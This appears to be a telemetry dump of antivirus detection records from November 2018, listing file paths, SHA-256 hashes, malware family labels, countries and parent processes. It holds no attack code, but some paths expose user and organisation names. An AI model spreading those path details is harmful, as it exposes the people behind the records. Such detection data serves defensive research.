  Row(detection=Row(filename='c02cbb0d0d2bfed2ffcaafe72195fa681811b2438ed8da8c998f4618ecdd419e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\C02CBB0D0D2BFED2FFCAAFE72195FA681811B2438ED8DA8C998F4618ECDD419E', filesize=832000, name='TR/ATRAPS.Gen2.#M300.#R100632'), hash='c02cbb0d0d2bfed2ffcaafe72195fa681811b2438ed8da8c998f4618ecdd419e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:05:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b6cd48e429aaa624ef27019a367e51cb048a3784ab5637011dd3166129e56bc4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B6CD48E429AAA624EF27019A367E51CB048A3784AB5637011DD3166129E56BC4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b6cd48e429aaa624ef27019a367e51cb048a3784ab5637011dd3166129e56bc4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150952-fdc6b4c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150952-FDC6B4C9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151224-1b093286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151224-1B093286', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095410-6e4b69b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095410-6E4B69B6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.vir', filepath='C:\\Program Files (x86)\\bilibili\\bilibili.VIR', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:46:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eset.nod32.antivirus.12.0.27.0.(x86+x64).+.crack.[cracksnow].tar', filepath='\\\\?\\F:\\Installs\\ESET.NOD32.Antivirus.12.0.27.0.(x86+x64).+.Crack.[CracksNow].tar', filesize=206592000, name='BAT/HackAv.pdtmn.#M1.#R1'), hash='900a3a9673dccd35a282cfabebb4c25fede19e8cea78f747edf378550d9c40c7', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:29:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odin3-v3.10.6.exe', filepath='F:\\New folder (9)\\Compressed\\CF-Auto-Root-j5lte-j5ltedx-smj500g\\Odin3-v3.10.6.exe', filesize=2304000, name='W32/Virut.Gen.#M1.#R1'), hash='bf58a04df5dde2d8b4590378205b23b313c940a1b53ec478f8b7e227531c1d90', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:57:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:00:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104626-b815a0a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d665385\\AVSCAN-20181101-102008-C9BE8594\\AVSCAN-20181101-104626-B815A0A5', filesize=604000, name='HEUR/APC.#M1.#R1'), hash='c7e099ed50c207a6082863ad67bcdd93ccb0470bd180060a08cf8682736be6ce', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:46:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmbservicemailsender.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Sony\\PMB\\PMBServiceMailSender.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='a2ee6cec323e6222acd777528779cff0251cf7101afcc967ec7ab8c709bb810e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\5yllm5qcdov\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194406-3879e9e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194406-3879E9E9', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercizi word.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Esercizi Word.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage abbinamenti inail.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\STAGE FIORONA\\stage abbinamenti inail.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:32:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T08:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:30:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225459-23ea0f28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e7bd116\\AVSCAN-20181104-225227-1042A9D6\\AVSCAN-20181104-225459-23EA0F28', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='33d69fa6ccc1befaa7873fd9d41937925752c0237be06c1be9ec2c72c4c9ee02', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:54:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:04:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iiwusqomkv.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\iiwusqomkV.exe', filesize=85584000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='8bc154916474de9fcf7b18d62ec08a73e7d5c869bc477c4063d85171d3967601', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T00:23:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T15:12:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nbsftp.exe', filepath='C:\\Program Files (x86)\\Nero\\Nero 7\\Nero BackItUp\\NBSFtp.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='2abc00890ee6e73dc5c1ab9a6328fe5c75d6931e4f008a4424ee155a31e5be0a', metadata=Row(cmdline='\\\\\\/c', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-04T18:37:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe619_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe619 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T05:56:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102925-ba83d1f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-102814-B1CC5213\\AVSCAN-20181104-102925-BA83D1F0', filesize=896000, name='TR/Dldr.Agent.896000.#M1.#R1'), hash='38a75b7396d53b515662130fec4490c372e85cfb06b7c2082bf721c3f4e77a8a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:29:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:13:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:57:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130811-09633656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130811-09633656', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T03:48:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5239353\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:29:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iiwusqomkv.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\iiwusqomkV.exe', filesize=85584000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='8bc154916474de9fcf7b18d62ec08a73e7d5c869bc477c4063d85171d3967601', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T00:24:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213607-8298dc5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_31bbdc35\\AVSCAN-20181104-213542-7EBA10A8\\AVSCAN-20181104-213607-8298DC5F', filesize=256000, name='TR/Nitol.blanu.#M1.#R1'), hash='5b91da70501c83f9f865f091ee61c1ab05bf726eb00199adc161e88303a8d843', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eccyq.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\eccyq.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:01:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3332566\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_uTorrent_0385757826.exe', parentsize=2300160, timestamp='2018-11-04T02:45:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T23:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192828-0e45851b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-192828-0E45851B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:28:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T22:49:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gax.dll', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3645892314-2022141175-574063286-1000\\$RCFQM95\\gax.dll', filesize=64000, name='HEUR/AGEN.1021032.#M1.#R1'), hash='5f23c9d33bff74c85144bae407e5f0374cc81855657f95fd5f5125a68e7ed64a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:12:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wsfacf1429558a55def27e5f106b5723eec-78c4.htm', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\autocad 2010 32 bit\\autocad_2010_english_mld_win_32bit\\x86\\acad\\program files\\root\\common files folder\\autodesk shared\\adlm\\r1\\cs-cz\\help\\sam\\files\\WSfacf1429558a55def27e5f106b5723eec-78c4.htm', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f78f4cd824c1dd4801655422055a4f1e4daa2cd7da56b6881f30fbddba6fe17', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:28:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221045-54247709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221045-54247709', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1792bcc5.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1792bcc5.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='meyerson.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Purling\\meyerson.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='707434991aa835159ceb7b4756130cb31fe22640ed4295a9c647599d438c00eb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:19:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mediaespresso.exe', filepath='C:\\Program Files (x86)\\CyberLink\\PowerDVD15\\MediaEspresso\\MediaEspresso.exe', filesize=360000, name='W32/Sality.AT.#M1.#R1'), hash='14b11b2c26bc0106392ad0794283fce71961a7cad7868e3d383406c7151191e9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EymrxCnT1kW3qYt0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T23:31:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113349-14c54390', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113349-14C54390', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='airinstallerrunner.exe', filepath='\\\\mybookliveduo\\public\\Software\\photoshop cs5\\payloads\\adobehelp\\airinstallerrunner.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='8d571b4da1ebfbbdcc99b019e67398672ab9928181faabd6f79b05e1734d13ce', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:wmBsWRBta0GDS5Wm.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T21:59:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe15_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:29:04Z'), dt=datetime.date(2018, 11, 4)),
